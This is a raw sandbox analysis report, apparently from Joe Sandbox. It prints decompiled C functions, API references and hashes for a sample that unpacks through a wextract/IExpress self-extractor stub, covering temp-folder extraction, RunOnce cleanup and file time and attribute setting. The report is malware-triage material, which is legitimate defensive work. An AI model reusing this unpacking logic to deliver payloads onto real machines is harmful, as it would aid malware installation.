                                                                                                                                                                                                        0x00de52b6
                                                                                                                                                                                                        0x00de52c1
                                                                                                                                                                                                        0x00de52c8
                                                                                                                                                                                                        0x00de52cb
                                                                                                                                                                                                        0x00de52cc
                                                                                                                                                                                                        0x00de52d4
                                                                                                                                                                                                        0x00de52d6
                                                                                                                                                                                                        0x00de52d7
                                                                                                                                                                                                        0x00de52de
                                                                                                                                                                                                        0x00de52e0
                                                                                                                                                                                                        0x00de52f2
                                                                                                                                                                                                        0x00de52fa
                                                                                                                                                                                                        0x00de52fa
                                                                                                                                                                                                        0x00de5302
                                                                                                                                                                                                        0x00de5305
                                                                                                                                                                                                        0x00de530c
                                                                                                                                                                                                        0x00de5312
                                                                                                                                                                                                        0x00de5316
                                                                                                                                                                                                        0x00de5316
                                                                                                                                                                                                        0x00de5317
                                                                                                                                                                                                        0x00de531c
                                                                                                                                                                                                        0x00de531f
                                                                                                                                                                                                        0x00de5333
                                                                                                                                                                                                        0x00de5345
                                                                                                                                                                                                        0x00de5351
                                                                                                                                                                                                        0x00de5359
                                                                                                                                                                                                        0x00de5359
                                                                                                                                                                                                        0x00de5363
                                                                                                                                                                                                        0x00de5369
                                                                                                                                                                                                        0x00de536f
                                                                                                                                                                                                        0x00de5374
                                                                                                                                                                                                        0x00de5374
                                                                                                                                                                                                        0x00de5381
                                                                                                                                                                                                        0x00de5387
                                                                                                                                                                                                        0x00de5387
                                                                                                                                                                                                        0x00de538f
                                                                                                                                                                                                        0x00de53a0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(00818E88,00000080,?,00000000), ref: 00DE52F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(00818E88), ref: 00DE52FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(00818E88,?,00000000), ref: 00DE5305
                                                                                                                                                                                                        • LocalFree.KERNEL32(00818E88), ref: 00DE530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00DE11FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE5363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00DE5334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-2493987848
                                                                                                                                                                                                        • Opcode ID: 7e0b9c80650c29138acc494fe5ec5af95b568a1d61172f34d63210f285707a89
                                                                                                                                                                                                        • Instruction ID: be88411a949e8a6fbde602cc900052b0d2a7474550f6898b7244a9fce7678080
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e0b9c80650c29138acc494fe5ec5af95b568a1d61172f34d63210f285707a89
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D21CF315017C5DBCB21BB16ED99B69B7A0EB00794F080169E446DA3A8CBB0AC84CB70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE1FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0xde8530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x00de1fee
                                                                                                                                                                                                        0x00de2005
                                                                                                                                                                                                        0x00de200d
                                                                                                                                                                                                        0x00de2017
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2020
                                                                                                                                                                                                        0x00de200d
                                                                                                                                                                                                        0x00de2029

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00DE538C,?,?,00DE538C), ref: 00DE2005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(00DE538C,wextract_cleanup3,?,?,00DE538C), ref: 00DE2017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00DE538C,?,?,00DE538C), ref: 00DE2020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                                                                                                                                                                        • API String ID: 849931509-2968168367
                                                                                                                                                                                                        • Opcode ID: d7dd29f3663217bd826104212c33ef68baae1a21f9c1358d778167d146687711
                                                                                                                                                                                                        • Instruction ID: 91d8a88204c03bc333ae3d69ee72a7947adb40afc62ab31441c00970221a497b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7dd29f3663217bd826104212c33ef68baae1a21f9c1358d778167d146687711
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9E0DF31900398BBD722BB92EC8AF297B3DE700741F140184B908E41A1EB616E08E631
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0xde91d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E00DE4E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E00DE6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0xde8584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0xde91e4;
                                                                                                                                                                                                        						_t58 = 0xde91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0xde91e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xde91e4;
                                                                                                                                                                                                        						_t30 = E00DE4702( &_v268, 0xde91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E00DE476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E00DE4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00DE47E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xde93f4 =  *0xde93f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0xde91e4;
                                                                                                                                                                                                        						_t63 = 0xde91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0xde91e5;
                                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                                        						_t69 =  &(_t74[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t46 =  *_t74;
                                                                                                                                                                                                        							_t74 =  &(_t74[1]);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        						} while (_t46 != 0);
                                                                                                                                                                                                        						_t73 = _t74 - _t69;
                                                                                                                                                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xde91e4;
                                                                                                                                                                                                        						_t30 = E00DE4702( &_v268, 0xde91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                        						_t30 = E00DE4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E00DE4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                        						__eflags = _t50;
                                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                                        							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                        							__eflags = _t51;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t51 = 0x80;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t30 = _t44 - 1;
                                                                                                                                                                                                        					__eflags = _t30;
                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a4 == 3) {
                                                                                                                                                                                                        					_t30 = E00DE4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}































                                                                                                                                                                                                        0x00de4cd0
                                                                                                                                                                                                        0x00de4cdb
                                                                                                                                                                                                        0x00de4ce0
                                                                                                                                                                                                        0x00de4ce2
                                                                                                                                                                                                        0x00de4cee
                                                                                                                                                                                                        0x00de4cf2
                                                                                                                                                                                                        0x00de4d0e
                                                                                                                                                                                                        0x00de4d0e
                                                                                                                                                                                                        0x00de4d11
                                                                                                                                                                                                        0x00de4e83
                                                                                                                                                                                                        0x00de4e88
                                                                                                                                                                                                        0x00de4e98
                                                                                                                                                                                                        0x00de4e98
                                                                                                                                                                                                        0x00de4d17
                                                                                                                                                                                                        0x00de4d17
                                                                                                                                                                                                        0x00de4d1a
                                                                                                                                                                                                        0x00de4d2f
                                                                                                                                                                                                        0x00de4d2f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4d2f
                                                                                                                                                                                                        0x00de4d1c
                                                                                                                                                                                                        0x00de4d1c
                                                                                                                                                                                                        0x00de4d1f
                                                                                                                                                                                                        0x00de4dcb
                                                                                                                                                                                                        0x00de4dd0
                                                                                                                                                                                                        0x00de4dd2
                                                                                                                                                                                                        0x00de4ddd
                                                                                                                                                                                                        0x00de4ddd
                                                                                                                                                                                                        0x00de4de3
                                                                                                                                                                                                        0x00de4de8
                                                                                                                                                                                                        0x00de4ded
                                                                                                                                                                                                        0x00de4ded
                                                                                                                                                                                                        0x00de4def
                                                                                                                                                                                                        0x00de4df0
                                                                                                                                                                                                        0x00de4df0
                                                                                                                                                                                                        0x00de4df4
                                                                                                                                                                                                        0x00de4df4
                                                                                                                                                                                                        0x00de4df6
                                                                                                                                                                                                        0x00de4df9
                                                                                                                                                                                                        0x00de4dfc
                                                                                                                                                                                                        0x00de4dfc
                                                                                                                                                                                                        0x00de4dfe
                                                                                                                                                                                                        0x00de4dff
                                                                                                                                                                                                        0x00de4dff
                                                                                                                                                                                                        0x00de4e03
                                                                                                                                                                                                        0x00de4e08
                                                                                                                                                                                                        0x00de4e0a
                                                                                                                                                                                                        0x00de4e0f
                                                                                                                                                                                                        0x00de4d03
                                                                                                                                                                                                        0x00de4d03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4d03
                                                                                                                                                                                                        0x00de4e18
                                                                                                                                                                                                        0x00de4e20
                                                                                                                                                                                                        0x00de4e25
                                                                                                                                                                                                        0x00de4e27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4e33
                                                                                                                                                                                                        0x00de4e38
                                                                                                                                                                                                        0x00de4e3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4e40
                                                                                                                                                                                                        0x00de4e51
                                                                                                                                                                                                        0x00de4e56
                                                                                                                                                                                                        0x00de4e5b
                                                                                                                                                                                                        0x00de4e5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4e6a
                                                                                                                                                                                                        0x00de4e6f
                                                                                                                                                                                                        0x00de4e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4e77
                                                                                                                                                                                                        0x00de4e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4e7d
                                                                                                                                                                                                        0x00de4d25
                                                                                                                                                                                                        0x00de4d25
                                                                                                                                                                                                        0x00de4d28
                                                                                                                                                                                                        0x00de4d36
                                                                                                                                                                                                        0x00de4d3b
                                                                                                                                                                                                        0x00de4d40
                                                                                                                                                                                                        0x00de4d40
                                                                                                                                                                                                        0x00de4d42
                                                                                                                                                                                                        0x00de4d43
                                                                                                                                                                                                        0x00de4d43
                                                                                                                                                                                                        0x00de4d47
                                                                                                                                                                                                        0x00de4d4a
                                                                                                                                                                                                        0x00de4d4a
                                                                                                                                                                                                        0x00de4d4c
                                                                                                                                                                                                        0x00de4d4f
                                                                                                                                                                                                        0x00de4d4f
                                                                                                                                                                                                        0x00de4d51
                                                                                                                                                                                                        0x00de4d52
                                                                                                                                                                                                        0x00de4d52
                                                                                                                                                                                                        0x00de4d56
                                                                                                                                                                                                        0x00de4d5b
                                                                                                                                                                                                        0x00de4d5d
                                                                                                                                                                                                        0x00de4d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4d67
                                                                                                                                                                                                        0x00de4d6f
                                                                                                                                                                                                        0x00de4d74
                                                                                                                                                                                                        0x00de4d76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4d7c
                                                                                                                                                                                                        0x00de4d84
                                                                                                                                                                                                        0x00de4d89
                                                                                                                                                                                                        0x00de4d8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4d94
                                                                                                                                                                                                        0x00de4d99
                                                                                                                                                                                                        0x00de4d9e
                                                                                                                                                                                                        0x00de4da1
                                                                                                                                                                                                        0x00de4daa
                                                                                                                                                                                                        0x00de4daa
                                                                                                                                                                                                        0x00de4da3
                                                                                                                                                                                                        0x00de4da3
                                                                                                                                                                                                        0x00de4da3
                                                                                                                                                                                                        0x00de4db5
                                                                                                                                                                                                        0x00de4dbb
                                                                                                                                                                                                        0x00de4dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4dc3
                                                                                                                                                                                                        0x00de4dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4dc5
                                                                                                                                                                                                        0x00de4dbd
                                                                                                                                                                                                        0x00de4d2a
                                                                                                                                                                                                        0x00de4d2a
                                                                                                                                                                                                        0x00de4d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4d2d
                                                                                                                                                                                                        0x00de4cf8
                                                                                                                                                                                                        0x00de4cfd
                                                                                                                                                                                                        0x00de4d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00DE4DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00DE4DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-2493987848
                                                                                                                                                                                                        • Opcode ID: 131bc1ea67ff98b0d4d1faf4dfd9b2aad0cd64451e5a715dda729052067808e2
                                                                                                                                                                                                        • Instruction ID: ede171b29962e733b15bfa77b3984c8f408e4c15532acf6430b4cbf5d9885904
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 131bc1ea67ff98b0d4d1faf4dfd9b2aad0cd64451e5a715dda729052067808e2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C4137366002818BCB21BF3ADD546FAB3A6EB45700F1C4668E886D7285DF31DE46C7B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0xde8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0xde8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x00de4c40
                                                                                                                                                                                                        0x00de4c4a
                                                                                                                                                                                                        0x00de4c8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4c70
                                                                                                                                                                                                        0x00de4c70
                                                                                                                                                                                                        0x00de4c7e
                                                                                                                                                                                                        0x00de4c86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4c8a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00DE4C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DE4C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE4C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 39f8d9abe1f3259c257d2c2fb4aa314eb374a5626fe5aa2d9ea44724186edc38
                                                                                                                                                                                                        • Instruction ID: f377be1aeda3017889705a80ac954ebd7827a7e82bbdc01a34921c1245f2b59e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39f8d9abe1f3259c257d2c2fb4aa314eb374a5626fe5aa2d9ea44724186edc38
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16F0967250134D6F9B55FFB5CC48DBB77ACEB08244744052AE415C2050EA31F914D771
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00DE487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00DE490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
